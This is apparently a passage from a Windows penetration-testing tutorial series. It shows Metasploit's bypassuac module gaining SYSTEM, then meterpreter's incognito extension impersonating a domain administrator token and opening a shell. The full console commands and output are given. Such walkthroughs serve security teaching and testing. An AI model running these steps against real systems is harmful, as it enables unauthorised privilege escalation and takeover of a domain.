Part Two: Session Token Hijacking
Bypassing User Account Control Now we have a session on the remote system, we will need to elevate our privileges further which requires bypassing Windows User Account Control (UAC) to obtain SYSTEM level access over the machine. This can be done using the Metasploit bypassuac module.
|msf exploit(bypassuac) > use exploit/windows/local/bypassuac msf exploit(bypassuac) > set SESSION 1 SESSION => 1 emsf exploit(bypassuac) > exploit [*] Started reverse handler on 18.104.22.168:4444 [*] UAC is Enabled, checking level… [+] UAC is set to Default [+] BypassUAC can bypass this setting, continuing… [+] Part of Administrators group! Continuing… [*] Uploaded the agent to the filesystem…. [*] Using custom payload /root/payload1.exe, RHOST and RPORT settings will be ignored! [*] Uploading the bypass UAC executable to the filesystem… meterpreter > getsystem …got system (via technique 1). meterpreter > getuid Server username: NT AUTHORITYSYSTEM|
Figure 1: Bypassing UAC
Now we have a stable remote connection to the system, and we have SYSTEM privileges we can look into expanding our access to the target network. Token Hijacking A bit of background, once authenticated to a Windows system, access tokens are stored to keep track of which users are currently authenticated. Two types of token exist: Delegate Tokens – these are set for users that have performed an “interactive” login to the host. I.e. users who have logged in locally or via remote desktop. Impersonation Tokens – these tokens are used for service accounts (sometimes referred to as batch accounts) which are typically used by automated processes. Tokens are kept on a system until it is restarted. Delegate tokens become Impersonation tokens once a user logs out, but the same rights are kept. We’re going to review which tokens are still resident in memory in case any users from a group which has higher privileges than we currently have has logged into the host.
|meterpreter > use incognito Loading extension incognito…success. Delegation Tokens Available ======================================== NT AUTHORITYLOCAL SERVICE NT AUTHORITYNETWORK SERVICE NT AUTHORITYSYSTEM BORDERGATE john.smith Impersonation Tokens Available ======================================== NT AUTHORITYANONYMOUS LOGON BORDERGATE Administrator meterpreter > impersonate_token BORDERGATE Administrator [-] No delegation token available [+] Successfully impersonated user BORDERGATE Administrator meterpreter > shell Process 6368 created. Channel 1 created. Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation. All rights reserved. C:Windowssystem32>whoami whoami BORDERGATE administrator|
Figure 2: Token Stealing
From figure 2 we can see that we have successfully impersonated the BorderGate domain administrator token, who has recently signed into the system. Now we can execute commands as the domain administrator, we could add a new domain administrator to the network however it’s likely that this would be detected. In the next part, we will look at a way of extracting clear text passwords from system using the level of access we have recently gained.